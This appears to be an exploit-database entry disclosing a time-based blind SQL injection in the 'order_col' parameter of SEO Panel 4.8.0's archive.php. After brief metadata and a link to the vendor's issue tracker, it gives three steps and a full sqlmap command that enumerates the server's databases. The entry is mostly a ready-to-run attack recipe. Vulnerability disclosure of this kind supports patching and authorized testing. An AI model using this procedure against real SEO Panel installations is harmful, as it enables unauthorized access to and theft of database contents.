EXPLOITS

SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1)

Author: Piyush Patil
type: webapps
platform: php
port: 
date_added: 2021-03-18  
date_updated: 2021-04-26  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 49666.txt  

# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1)
# Date: 17/02/2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
# Version: 4.8.0


# Reference - https://github.com/seopanel/Seo-Panel/issues/209

Step 1 - Login to the SEO Panel with admin credentials.
Step 2 - Go to archive.php
Step 3 - Change "order_col" value to "*" and copy the request
Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL
--dbs --technique=T --flush-session